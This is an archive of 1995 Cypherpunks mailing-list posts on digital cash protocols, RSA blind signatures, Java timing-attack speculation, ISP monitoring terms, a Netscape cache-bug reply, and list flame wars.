your long distance service to AT&T or buy an AT&T answering machine or something. But that part of the company is very remote from my food chain. I'm from the part of the company that _spends_ money. Other parts _make_ the money. > And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves > cypherpunks, when they are so clearly just working us for their > corporate interests? Again, I think you're confused. Jeff Weinstein works for Netscape, not AT&T. I think there's a connection between AT&T and Netscape somewhere (like we bundle netscape with worldnet service), but I don't really know the details. > I wonder how much they get paid to monitor this list? I can't speak for Jeff Weinstein, but in my case, not nearly enough. -matt "I'm from The Phone Company and I'm here to help you." From anon-remailer at utopia.hacktic.nl Tue Dec 19 16:07:44 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Tue, 19 Dec 95 16:07:44 PST Subject: No Subject Message-ID: <199512200007.BAA29596@utopia.hacktic.nl> >I would think that ISPs (and even commercial online services) would >prefer that their customers use strong crypto because it's less for >them to worry about ("Are they really sending pornography or death >threats though our network?"). While most ISP's may not want to be responsible for monitoring transmissions, check out a portion of an agreement from mine. (I haven't and won't sign such an agreement, may therefore be terminated at month's end.) "4.1 PCIX may elect to electronically monitor any and all traffic which passes over our Wide Area Network. This monitoring may include public as well as private communications and data transfers from our Members and to our Members as well as any and all communications and data transfers to and from any other internet sites. .... The monitoring and disclosure activities of PCIX may negate the privacy protections which the Member would otherwise enjoy under federal and state law, including the Electronic Privacy Communications Act. Member specifically agrees that PCIX may do so and Member understands that he or she is giving up privacy rights which he or she would otherwise be entitled to under the law." Hope this isn't the start of a trend! groundfog at nym.gondolin.org From jimbell at pacifier.com Tue Dec 19 00:12:02 1995 From: jimbell at pacifier.com (jim bell) Date: Tue, 19 Dec 1995 16:12:02 +0800 Subject: Political Cleanup program Message-ID: At 03:09 PM 12/17/95 -0500, you wrote: >A much simpler solution might be to just force all politicians to give up >their campaign funds when they retire, or even better, immediately >following the elections. Today, whatever is left in their campaign funds >are given over to them when they retire or are forced out of office, on top >of their lucrative pensions. > For Congress, I think this changed a few years ago. Before a certain date, retiring Congressmen could convert unused campaign funds to their own money. At some point they changed the rules, and that is no longer the case. From jirib at sweeney.cs.monash.edu.au Tue Dec 19 16:27:58 1995 From: jirib at sweeney.cs.monash.edu.au (Jiri Baum) Date: Tue, 19 Dec 95 16:27:58 PST Subject: What ever happened to... Cray Comp/NSA co-development In-Reply-To: Message-ID: <199512200022.LAA28002@sweeney.cs.monash.edu.au> -----BEGIN PGP SIGNED MESSAGE----- Hello, tcmay wrote: ... > Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime > has two factors.) ... Can someone enlighten me as to what the two factors are? With sensible definitions I've heard you either get one (just itself) or four (itself [p], both units [1,-1] and the co-whatsitsname [-p]). (Sorry to pick on tcmay, but usually when you factorise a number you *never* put it a "1*", for example: 6 = 2*3 9 = 3*3*3 and 7 = 7 not 7 = 1*7 , so I suspect the usual statement would be "Every prime has one factor.".) Or am I totally clueless? Jiri - -- If you want an answer, please mail to . On sweeney, I may delete without reading! PGP 463A14D5 (but it's at home so it'll take a day or two) PGP EF0607F9 (but it's at uni so don't rely on it too much) -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMNdXQyxV6mvvBgf5AQEaNwP/RB9ABUWWX20hChSFC5embOLwv7dhI4qU rJkz/VmOM8y746be87nAIKCih3hJCz7G4OqsqiVdtvhx2FqldqSuw6Jmp3Mx41ut l+OdwwHYH0K7OH1SIRr9nfpZ4IuZ3dsXVTTPl1H8Z3ktv5B4hFziLiIt3WPZTqVu k4nXVsirfuo= =X1zb -----END PGP SIGNATURE----- From futplex at pseudonym.com Tue Dec 19 00:43:51 1995 From: futplex at pseudonym.com (Futplex) Date: Tue, 19 Dec 1995 16:43:51 +0800 Subject: Java and timing info - second attempt In-Reply-To: <9512190402.AA12992@bilbo.suite.com> Message-ID: <199512190712.CAA21135@thor.cs.umass.edu> Jim Miller writes: > Combine this with some a standard crypto API for doing Web-based digital > signatures or authentication or encryption and you may begin to see some > possibilities. > > Would it be possible to create a Java applet that causes the client > machine to sign or encrypt something with their private key, and then send > back timing info? > > For the answer to be YES a few things need to be true. There needs to be > some sort of standard crypto API in use that can be accessed by a Java > script, and Java scripts need to be able to capture and send back timing > info. Does anyone on this list know enough about Java to know if it can > do any of these things? [I've read a bit more about Java since you last asked the question, coincidentally, but I don't know a huge amount about it yet.] I think this scenario is certainly possible, from a technical point of view. Crypto APIs in general should force the user to be aware of how she is using her key material. Ultimately you can't save people from themselves. (One of my favorite non sequiturs. ;) User education helps. But just as users are tricked by various social engineering methods into divulging their account passphrases, so they can be duped into encrypting or signing for a stranger's timing pleasure. However, one would certainly hope that the crypto Java interfaces that get written are designed to mask timing information in the wake of Kocher. In fact, this is precisely the sort of thing "we" should consider promulgating.... -Futplex From mab at crypto.com Tue Dec 19 16:45:46 1995 From: mab at crypto.com (Matt Blaze) Date: Tue, 19 Dec 95 16:45:46 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: <199512192349.SAA25296@jekyll.piermont.com> Message-ID: <199512200051.TAA17476@crypto.com> Perry wonders: > What I want to know is, why are you doing this? Are you trying to > start a flame war? Are you just an asshole? Are you Detweiler? Whats > the motive? I must admit I don't quite get it, although I think there are people who really can't distinguish between a person and a person's employer, and who believe that the entire world is a black-and-white battle between good and evil. Jeff Weinstein got treated rudely back during the feeding frenzy where everyone hated Netscape because he works for Netscape. Brian Davis got treated rudely when he first joined the list because he works for the government as a federal (?) prosecutor. I get treated rudely from time to time because I work for AT&T. It doesn't bother me, especially when it comes from an anonymous source who for all we know might earn his or her keep by advertising the joys of smoking cigarettes to small children or by testing the toxic effects of new cosmetics on cute, furry animals. I figure it all just comes with the turf. At least I don't get blood thrown on my by protestors the way people who work in animal testing labs do... -matt From weidai at eskimo.com Tue Dec 19 00:56:28 1995 From: weidai at eskimo.com (Wei Dai) Date: Tue, 19 Dec 1995 16:56:28 +0800 Subject: wish list for Crypto++? Message-ID: I am looking for suggestions for features to include in the next version of Crypto++ (current version is 1.1, you can find it at http://www.eskimo.com/~weidai/cryptlib.html). Major additions already planned/implemented include speed improvements, Safer (all the variations), and elliptic curve cryptosystems (over prime fields as well as fields of characteristic 2). There is also a good chance that RSA will be added back, but I'm still waiting for the final word from the RSADSI lawyer. What else do people want to see? Wei Dai From rah at shipwright.com Tue Dec 19 17:08:15 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 19 Dec 95 17:08:15 PST Subject: King Kong Does e$ Message-ID: -----BEGIN PGP SIGNED MESSAGE----- King Kong Does e$ A while back, when the Microsoft Network hype was at its height, I forwarded a bunch of articles to www-buyinfo entitled "Oh, No, there goes Tokyo", about how Godzilla, in the form of Microsoft's Microsoft Network, was going to stomp all over Tokyo, in the form of the net. This was before I found out that Netscape's codeword for their Navigator HTML Browser was "Mozilla". So, along comes the following on the DCSB list, courtesy of the esteemed Mr. Lethin: Wednesday, December 13, 1995 Refreshments 4:15 PM 4:30 - 6:00 PM Bartos Theater, E15-070 MIT Media Lab Ames Street, Cambridge, MA, USA Electronic Money Made Easy Dan Simon (dansimon at microsoft.com) Mac in hand, I went to a presentation at the Media Lab's basement auditorium, and proceed to transcribe his copious overheads, sans graphics, as fast as my fingers could fly... Which I present here in it's raw form, with a few corrections, his cryptic (ahem...) source citations, viz: (cf., MN 93), and the ocassional note I could cram in when he stopped flipping charts... Oh, no, there goes Zurich... - -------------------- Dan Simon Microsoft, now, Quantum Computing/crypto in Canada before... Characteristics of cash Portable Anonymous Confidential Easily and instantly transferrable Owned by those posessing it Hard to counterfiet Has multiple interchangeable forms. What isn't cash: e-credit Non-anonymous Severely limited confidentiality Complicated payment protocols two parties and both their respective banks involved Ownership determined by record-keeping credit/debit authority What isn't e-cash: offline e-cash One desirable feature of cash: transfer without an intermediary Problem: doublespending: restore prespending state, respend the same cash Tracing re-spent cash useless if it was stolen (cf. (cfnII 0091, Yac94, etc) Tamperproof hardware isn't (cf EGY83) Can broadcast small amounts over the net at a huge payoff. Result cash as secure cellphone codes (better not be worth much...) Offline Electronic "bills" don't work. Too big for offline Offline Electronic coins do work. Easy to counterfiet, not much profit. (He is interested in electronic banknotes, on-line bearer securities, in other words) What can we assume: Customers, merchants, banks may wish to transact via many different possible media: telephone, Internet, cable network, smartcard/terminal, etc. etc. If a customer wants a transaction to be anonymous, then an anonymous medium must be used (no callerid on the telephone, anonymous remailer, etc) A Modest Proposal On-line cash issued by banks owned by a possessor, Cryptographically hard to counterfiet Cash ownership transferred with bank's help aAnonymity of payer, payee based on anonymity of communication medium No individual account or prior trust relationship necessary to use a bank's cash (cf., MN 93) Formal Security E-cash schemes generally described as a set of individual protocols (payer-payee, payer-bank, etc.( with intuitively described goals) But formal proof of security really requires a model of a full network, to consider general attacks, and explicit, formal security goals Previous examples: (BEA91/MR/91) for computation (RS93) for anonymity, (BR93) for authentication What does it look like A bank issued banknote has a serial number,amount, and treasuer's signature It also has an associated "secret" which can be checked against the serial number, but can't be gotten from the serial number Its owner is whoever has the secret... ...but when the issuing bank gets the secret, the banknote is no longer valid. Publish the bank notes as broken, banknotes no longer valid. (spiffy graphic elided) Customer chooses secret s, serial number n, n=h(s) and amount. Customer pays bank (by any method) the amount of the desired banknote bank signs serial number and amount Transaction may be anonymous (physical cash purchase at bank) pick serial number, bank uses private signature to sign the serial number. (May's train-locker applies) How is change made: Customer generates secrets, serial numbers and amounts for smaller banknotes Customer gives bank the secret for the large banknote, and serial numbers and amounts for smaller ones Bank signs serial numbers and amounts, stores the secret for large now-invalid banknote Transaction can be completely anonymous. How is it used for payment Payer simply gives bank note to payee by handing over the secret payee immediately exchanges the banknote for new ones anonymously, if desired Old banknote is now invalid, since bank has its secret; hence payer can't respend it If the bank note is already invalid, bank rejcts exchange and informs payee. "In effect, these are disposable banknotes" "the simple way to get around exploding banknote numbers, issue it with an expiry date." Estimated outstanding certificates numbers would then be within the storage capacity of a bank. (per a crony in the Bank of Japan) Public key from the bank is needed to keep the bank honest. "miracle of one-way function" (shuts down clueless question...) Model Synchronous network of parties, some dishonest, one of them is the bank Parties can exchange messages anonymously Responder can always broadcast Parties and bank keep track of balances each round, a party receives instruction to deposit/withwdraw/ a unit value coin to/from the bank or pay a coin to another party (missed one point..) Security goals Correctness: if all parties are honest, then instructions result in correct new balances Integrity: parties cannot be ripped off Honest bank never accepts more coins than have been withdrawn Party can detect dishonest bank Anonymity: information available to any coalition should be indistinquishable for any sequence of instructions consistent with the starting and ending points of distinguised coins entering/leaving coalition Weak anonymity, contends that that's what we have with serial numbered physical notes anyway Can make stronger with subsequent anonymous change operations at a bank... (can also buy with cash at a desk, also on the net with another form of digital cash ;-) Efficiency: cost of security should grow slowly (polylog at worst) with size of network. Convenience Features Only payer, payee, issuing bank involved in transaction Each validation and transfer immediate Portable Easy to handle Expiry dates can be added. If anonymous withdrawl, then can get lost money back on expiry date, if coins weren't cashed. Security Digital signature makes cash unforgeable Online validation prevents double spending Secrecy of secret preserved even if serial number publically available Bank's *only* secret is its private signature key Digital signature publicly commits bank to redeeming its e-cash; hence customers need not have special trust relationship with bank. Audience Q: Borenstein's scenario. A: bad problem. someone can split bank private keys, for instance (No problem, strawman, what happens when someone breaks Ft. Knox?... --RAH ;-) Extra features Payee can have the e-cash non-anonymously deposited in bank account for easier handling and better security (bank as back up) Payer can include transaction details with payment package or hide them in the secret (to create transaction record to be archived by, for example, by the bank) helpful in dispute. "Secure payments" and E-cash "Don't send cash in the mail" even if it gets there, receiver need not admit it One solution: secure payment protocols (Microsoft/Visa STT) Non-anonymous: transaction details attached to payment mediated by payer's credit card issuer Payee can delay response and batch process transactions "Secure Payments" Protocol's basic idea: payer sends encrypted package to payee giving credit card number and transaction details, "payment instructions". Only acquirer can read it Valid credit card number plus payer's digital signature assure acquirer that payment is legitimate (missed one point) Secure ecash payments Payer substitutes ecash secrets for credit card number in payment instruction package payment desiring ecash settlement. Includes ecash serial numbers amounts when sending package to acquirer E-cash issuing bank bank checks validity of ecash payment and exchanges it for merchant as apprpriate by signing serial numbers, amounts Instant payment, no bad debt Questions Where is the communications cost/ security tradeoff? Solutions to dine and dash problem with dishonest bank (anonymity must broken to nark on the bank) (cf Cle85)? Efficient offline anonymous micropayments solutions? Implimentation pitfalls? - ------------------- So, there are my notes, such as they are... I walked away from this thinking that on-line cash covers a multitude of sins: You can stick any "secret" into digital cash as long as it's unique and you trust the bank to keep it. If bank signs the secret they've shared with you and reveal it before some expiry date, they can be put out of business, because they've blown their reputation. If they claim that you've not shared a secret, you expose the secret and their signature, same happens. If you put an expiry date on Simon's digital cash, you don't have to keep track of it all. If you have an expiry date on Simon's cash, if you loose it, you can tell the bank, and if it's not cashed by the expiry date they can give you your money back. There's a distinction between on-line "banknotes", which are valuable enough to forge, and off-line "coins", which are not. Simon has a system which has just enough anonymity to be economically useful, but not perfect enough to keep the truly paranoid happy. Must be something in the water in Redmond. Essentially, the bank becomes a quasi-anonymous "line" in what's normally a peer-to-peer transaction. Takes getting used to. He's got a web page with all of this in gory detail, I bet, and his e-mail address is at the top of this post. Speaking of micropayments, Mark Manasse, Ron Rivest, Adi Shamir, and Silvio Micali did another talk on Friday which touched on several cool micropayment schemes, and a much more cost-effective way to do key revocation. Though I got there exactly 6 minutes late, I missed one presentation, and didn't take any notes for the rest. Hope someone else here did. I saw lots of DCSB/Cypherpunks there... Any takers? Cheers, Bob Hettinga -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNdbfvgyLN8bw6ZVAQH7qwP9GKSx7BegCr5lAOmG6lBo4OYgCPUO9j8N bqf89b46rTkYrTkSB2DDX7BG/wu4nv/pnf7rA7UBHJjydZuiAVG9KplzevUWFoaI xVeW8AoVPgKvkZsELK4VrrOayAXNxX9FBX7vGwsedl1SjQgyA3Qo62799GOIDrpQ xuXYtTtaTfw= =LQk+ -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From rsalz at osf.org Tue Dec 19 17:28:54 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 19 Dec 95 17:28:54 PST Subject: King Kong Does e$ Message-ID: <9512200125.AA06259@sulphur.osf.org> >Speaking of micropayments, Mark Manasse, Ron Rivest, Adi Shamir, and >Silvio Micali did another talk on Friday which touched on several cool >micropayment schemes, and a much more cost-effective way to do key >revocation. Though I got there exactly 6 minutes late, I missed one >presentation, and didn't take any notes for the rest. Hope someone else >here did. I saw lots of DCSB/Cypherpunks there... Any takers? A reference for Mark's paper on Millicent is The Millicent Protocol for Inexpensive Electronic Commerce Of all the various payment protocols I've seen, this was one of the few that studied the available protocol bandwidth before designing a protocol. Folks with an engineering slant should appreciate the work here. I would be VERY interested in URL's and summaries of Micali's talk. (I really wanted to go but after spending most of the week at the WWW4 conference I had to commit serious time to being anchored to the office.) /r$ From hfinney at shell.portal.com Tue Dec 19 17:30:30 1995 From: hfinney at shell.portal.com (Hal) Date: Tue, 19 Dec 95 17:30:30 PST Subject: E-cash coin questions (Mark Twain / Digicash) Message-ID: <199512200128.RAA09801@jobe.shell.portal.com> From: "David Klur" > > 1. How many different coins (serial numbers) can the current Mark > Twain/Digicash protocol support? I don't know this offhand, but I assume it is at least 2^64. > 2. Does Mark Twain bank maintain 2 lists: 1 of all the ecash serial > numbers for all coins ever produced, and 1 of all the ecash serial > numbers for all coins that have been spent before? Or just 1 list of > the spent coins (assuming that any coin that is signed w/MT's private > key and does not appear on the "spent" list is still valid and is not > counterfeit)? It is not possible for the bank to have a list of the serial numbers on coins produced, since it doesn't know this information. Each coin is created by a user's client software, which chooses the serial number at random. When it is sent to the bank to be signed, the serial number is blinded by being multiplied by a random number, which is divided off after the client gets it back from the bank. So the bank never sees a coin's serial number until it is deposited. > 3. The Digicash scheme allows each coin to be used only once and then > destroyed. How many coins will it take before all possible coins are > minted, used and destroyed thereby requiring banks to issue new coins > with "recycled" serial numbers? Remember, each time a "transaction" > takes place, an existing coin is destroyed and a new coin is minted. > and a transaction can simply be Alice giving her friend Bob a dollar > (not necessarily using the ecash for a purchase) It is easy to make this number so large that it will take longer than the age of the universe for this to happen. It just takes a dozen or so bytes per coin. > 4. What is the probability of guessing a valid serial number, > assuming there are 1 million, 1 billion or 1 trillion coins in > circulation? Assuming the serial numbers are of the sizes I suggest above, this chance is so close to zero that your chances of being named King of the Earth next year (along with the assumption that we switch to a World Government and it is a monarchy) are much greater. > 5. Suppose you have a very large number of ecash coins signed by the > same bank (say, Mark Twain) and you know the record layout of each > coin (easy enough since you can decrypt it with the bank's public > key), and for each coin the "bank name" field is the same (because > it's the same bank!) -- then, would it be possible to hack the RSA > encryption and recreate the bank's private key? I don't fully understand what you are getting at, but there are several false assumptions here. The "coin" has several parts, one of which is an RSA signed portion with a number in it, for which I am accepting your terminology of it being a "serial number". This terminology is not quite right, as the coins are not numbered serially (that is, sequentially, 1, 2, 3, etc.), rather the numbers are random. But it does capture the essential idea that each coin's number is unique. You do know the record layout of each coin, but that is because it is documented and because your client creates coins, not because you could decrypt it with the bank's public key. The coin does not have the bank name field within the RSA signed part. There is other information which goes along with the coin, including an identifier for the bank, outside the RSA signed portion. For the general question of whether inspection of a lot of RSA-signed coins would allow you to deduce the private key, the answer is no, as far as is known. Actually the attack you can mount is stronger than this; you can get the bank to RSA sign any number. You could ask it to sign "1", for example, and you will get "1" back (so that's not very useful). I have tried to think of a way of getting some useful information from getting it to sign "2", since that is such a simple number. But it is raised to a very large power, and as far as I can see what you will get back is just a random looking number, with all hints about the exponent gone. Again, as far as anyone knows, there is no way to break RSA using these kinds of attacks, at least not any more cheaply than factoring the modulus. Hal From samman-ben at CS.YALE.EDU Tue Dec 19 17:44:21 1995 From: samman-ben at CS.YALE.EDU (Rev. Ben) Date: Tue, 19 Dec 95 17:44:21 PST Subject: What ever happened to... Cray Comp/NSA co-development In-Reply-To: <199512200022.LAA28002@sweeney.cs.monash.edu.au> Message-ID: On Wed, 20 Dec 1995, Jiri Baum wrote: ... > Can someone enlighten me as to what the two factors are? ... In this country, children are taught that prime numbers indeed have two factors: 1 and themselves. I suspect its a cultural difference. Ben. ____ Ben Samman..............................................samman at cs.yale.edu "If what Proust says is true, that happiness is the absence of fever, then I will never know happiness. For I am possessed by a fever for knowledge, experience, and creation." -Anais Nin PGP Encrypted Mail Welcomed Finger samman at powered.cs.yale.edu for key Want to give a soon-to-be college grad a job? Mail me for a resume From ncognito at gate.net Tue Dec 19 01:46:14 1995 From: ncognito at gate.net (Ben Holiday) Date: Tue, 19 Dec 1995 17:46:14 +0800 Subject: redirect of newsgroups In-Reply-To: <199512190221.VAA20286@homeport.org> Message-ID: > > | For those of us sitting behind a firewall that blocks out all of the > | alt, rec, etc.. newsgroups...is there another way to access these > | groups? For example, redirecting the contents of alt.2600 to, say, > | comp.2600 (because this firewall allows the comp.xxx groups through). > | Or any other hacks around this inconvenience? ( im gonna work this back onto topic.. just watch. :) ) There is a rather lengthy FAQ that explains about a zillion different ways to get your paws on whichever newsgroups you desire. Its called "How to Receive Banned News Groups FAQ" and you can find it at: http://www.cen.uiuc.edu/~jg11772/banned-groups-faq.html (here it comes..) In addition to covering topics relating to finding what you want in the way of usenet news, it also has a pretty well thought out anti-censorship rant towards the end, and gives pointers to some open NNTP servers, and freenets where you can obtain free access to usenet news. There is also a short list of mail to news gateways, which is useful if you would like to post to usenet via a remailer (or if your sysadmin censors which groups you have access to). (Ok.. maybe not totally on topic.. i tried.. blegh) have a day. From tcmay at got.net Tue Dec 19 01:47:04 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Dec 1995 17:47:04 +0800 Subject: Campaign Finance Reform Message-ID: Sorry that I haven't been following this "Campaign finance reform" thread, but I did stop to read what Brian Davis said, and his point actually raises an important game-theoretic issue which we haven't talked about in a while (maybe because everyone has so internalized it as part of their gestalt that they see no need to mention it...which I doubt). At 7:55 PM 12/18/95, Brian Davis wrote: >On Mon, 18 Dec 1995, jim bell wrote: >> All of which raises numerous opportunities for sting operations against >> politicians, done by individuals by procedures provided for under law. >> Escrow (Okay, I know that's a dirty word around here, but...) an encrypted >> statement of how you intend to run the sting, to be opened by the escrow >> agent at some point in the future, explaining who you're going after and >> how. Make the contribution, keep evidence, and if you're successfull the >> congressman goes to jail for a few years. > > >The problem with the private investigation is that law enforcement may >not believe you were an "innocent" citizen conducting an investigation. >Remember the ABSCAM Congressman who contended he was conducting his own >investigation ... The "game-theoretic issue" is that of the "brilliant penny scam," well-known to grifters and con artists and cryptographers (and all good cryptographers should be aware of cons and scams, as cryptography protocols bear close resemblances to confidence games, or at least must cope with them). I claim that I have a "magic penny," or "brilliant penny," which can predict which way the price of Netscape stock will move on the next day. I deposit a sealed prediction of what my brilliant penny told me would happen, with a reputable escrow agent. I invite investors to cast their lot with me. On each day, I retrieve the sealed prediction and, voila!, it is confirmed to be the truth. Obviously, what I have done is to record predictions covering both outcomes--Netscape going up and going down--but have conveniently only retrieved the one I know matches the actual outcome. (Sure, it's possible to think of some ways to get around this. Left as an exercise for the student.) The connection with Jim Bell's idea is obvious. Anyone planning a crime, say, buying drugs (not a crime in my book, but that's another story), cooks up a strategy to claim he was "investigating how easily drugs may be bought on the streets of Minneapolis." He seals a letter to himself detailing how his "expose" is to be run. If caught, he smugly says, "But I'm just doing a story on how drugs may be bought. You'll find my description of my plans sealed in an envelope with my lawyer." Not very convincing. (The reason this is a variant of the brilliant penny scam is that the costs of making the claim are low, and the ability to selectively reveal forces the outcomes to match. Not convincing.) >Escrowing what you intend to do could be seen as blackmail ammunition if >the Congressman fails to produce. > >Unfortunately for the Cryptoanarchists (tm -- in more ways than one), >absent law enforcement running the "sting" you are taking a risk of being >stung yourself. "Escrowing" where the access key is controlled by the party intending to do something illegal--blackmail, drugs, etc.--falls into the category I just described. Though I'm not a lawyer, I rather suspect courts have looked askance at such "covers of convenience" intended to be used as protection. By the way, dramatically better protection is gotten--so I understand--if a "legitimate" reporting assignment is involved. Thus, if a reporter is assigned by her editor to try to buy a dime bag on the corner of 8th and Artesia, and she somewhow gets caught, adequate proof can be produced to ensure no prosecution occurs (this obviously depends on a lot of factors). On the issue of bribing officials, there are of course all sorts of ways to do this. Outright bribes will always be handled more carefully than "mere" campaign contributions, which are only quasi-bribes. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jsw at netscape.com Tue Dec 19 01:49:16 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Tue, 19 Dec 1995 17:49:16 +0800 Subject: (Fwd) SECURITY ALERT: Password protection bug in Netscape 2.0b In-Reply-To: <9512190026.AA15461@toad.com> Message-ID: <30D65A4B.7ED1@netscape.com> This report is mostly bogus. Netscape does not, and never has stored http auth passwords in files on your disk. However we do cache documents from servers that use http auth. In this case the user had their preferences set to check the host site for updated content "once per session". There is a bug, which we are fixing before 2.0 ships, that if the auth fails the document should be removed from the cache but was not. If the user had set their cache checking to "never", then if the document is in the cache, it will always be shown to the user, since no connection is made to the server. Content providers who don't want their web pages cached should use the 'Pragma: no-cache' http header. This will tell the navigator to not save the document in the disk cache. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From aleph1 at dfw.net Tue Dec 19 17:49:53 1995 From: aleph1 at dfw.net (Aleph One) Date: Tue, 19 Dec 95 17:49:53 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: <199512192232.WAA18554@pangaea.ang.ecafe.org> Message-ID: On Tue, 19 Dec 1995, ECafe Anonymous Remailer wrote: > I don't understand why this group continues to tolerate these blatently > commercial messages from att (and netscape.) (The message is > really just an ad for the cryptolib product, as it says). I've also said > this b4 but I'll say it again: why would anyone in their right mind trust > binary code from att after the clipper fiasco. > I don't understand why this group continues to tolerate these compleatly stupid messages from Mr. Anonymous (and other nuts.) (The message is really just a llame by Detweller (sp?), as it indicates). I've also said this b4 but I'll say it again: why would anyone in their right mind pay any attention to an anonymous idiot without enough face to get a nym. > And why do we tolerate Jeff Weinstein and Mat Blaze calling themselves > cypherpunks, when they are so clearly just working us for their > corporate interests? I wonder how much they get paid to monitor this > list? > > You might want to have a doctor help you take your head out of your ass. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 From tcmay at got.net Tue Dec 19 18:30:57 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Dec 95 18:30:57 PST Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: At 12:22 AM 12/20/95, Jiri Baum wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >Hello, > >tcmay wrote: >... >> Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime >> has two factors.) >... > >Can someone enlighten me as to what the two factors are? > >With sensible definitions I've heard you either get one (just itself) >or four (itself [p], both units [1,-1] and the co-whatsitsname [-p]). You're looking too deeply. My point was in response to the very common error people make in talking about "factoring a large prime number." A prime is actually easy to factor: itself and 1, which is the point I was making. (One can quibble about whether 1 is a factor...I include it, though 1 is admittedly not considered a prime. But this is a quibble, I think.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From hua at chromatic.com Tue Dec 19 19:02:36 1995 From: hua at chromatic.com (Ernest Hua) Date: Tue, 19 Dec 95 19:02:36 PST Subject: Is ths legal?... In-Reply-To: Message-ID: <9512182021.AA23246@krypton.chromatic.com> > The answer to the "is this legal?" question is more complex than > simply "private versus public" university. There are fairly strict > federal anti-wiretapping laws. It is hardly clear that a private > university may eavesdrop on students' phone or computer conversations, > even if conducted over the university's network. Furthermore, many > states have their own anti-wiretap and anti-eavesdrop laws, which are > even stricter than federal standards. I don't have the time nor the > inclination to do research into Oklahoma law, but we did some research > into this area of state and federal law for the LaMacchia case and > concluded that in its investigation of David LaMacchia, MIT very well > might have violated federal laws. It is definitely legal for private entities to have strict control over their own resources. In particular, it is legal for a company to listen in on their phone conversations for quality control purposes if they announce this fact ahead of time (you may have heard such a disclaimer when you call tech support, for instance). Also, if a student signs such a waiver acknowledging that the situation at this school is not necessarily that of the "norm" or of potentially overriding state or federal law, there is a good chance the student has signed away their right/priviledge of absolute privacy. Unless there is serious violation of Constitutional rights or if the contract is constructed or negotiated in bad faith or in some illegal manner, the old saying applies: "a contract is a contract". Ern From frantz at netcom.com Tue Dec 19 03:06:45 1995 From: frantz at netcom.com (Bill Frantz) Date: Tue, 19 Dec 1995 19:06:45 +0800 Subject: Java and timing info - second attempt Message-ID: <199512190724.XAA10835@netcom22.netcom.com> At 22:31 12/18/95 -0800, Jeff Weinstein wrote: > In Netscape Navigator 2.0 Java and JavaScript do not have access >to crypto routines. At some point in the future this will probably >change, but only after we understand the implications much better >than we do today. More importantly for covert channel analysis, do they have access to good clocks? Access to a good clock could make a Java applet a good candidate for the receiver in a generalized covert channel attack. Access to both process time and real-world time can give a good indication of load on the processor, and might be needed for animation. A transmitter could send by using or not using the CPU. (Installing the transmitter is left as an excersize for the student. ;-) ) Who said that life was safe? ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From mhw at wittsend.com Tue Dec 19 19:36:57 1995 From: mhw at wittsend.com (Michael H. Warfield) Date: Tue, 19 Dec 95 19:36:57 PST Subject: revised time quantization package (Unix & WIN32) available In-Reply-To: <199512192349.SAA25296@jekyll.piermont.com> Message-ID: Perry E. Metzger enscribed thusly: > ECafe Anonymous Remailer writes: > [Lots of garbage slandering Matt Blaze, who's about as close to being > a dyed-in-the-DNA cypherpunk as you can get.] Yeah! Really! We're talking about Matt "Honey I broke the chip" Blaze here. Single handedly did more damage to the clipper chip than any other individual or group! > What I want to know is, why are you doing this? Are you trying to > start a flame war? Are you just an asshole? Are you Detweiler? Whats > the motive? Perry, I liked your reaction to the last chump like this much better. We should find out what drugs they are taking and where we can buy some! They are obviously VERY good considering that they no longer have any connection with reality. I'm just impressed that they can manage to find their keyboard with the halucinations they're having! > .pm Mike -- Michael H. Warfield | (770) 985-6132 | mhw at WittsEnd.com (The Mad Wizard) | (770) 925-8248 | http://www.wittsend.com/mhw/ NIC whois: MHW9 | An optimist believes we live in the best of all PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! From llurch at networking.stanford.edu Tue Dec 19 20:07:51 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Tue, 19 Dec 95 20:07:51 PST Subject: Update on Microsoft .PWL and SMB Spin Control In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I was thinking about copying this to Yves and Yusuf, but I figure it will get to them anyway. The WinNews #22 mass mailing (by the way, there seems to have been no #21) has this to say about the .PWL bug: NEW POSTINGS TO WINDOWS 95 WEB SITE AND FORUMS * Under "WINDOWS 95 SOFTWARE LIBRARY" * In "Windows 95 Updates" - "Enhanced Password Cache Security Update" - an enhanced security component that substantially strengthens the encryption used for the Microsoft Windows 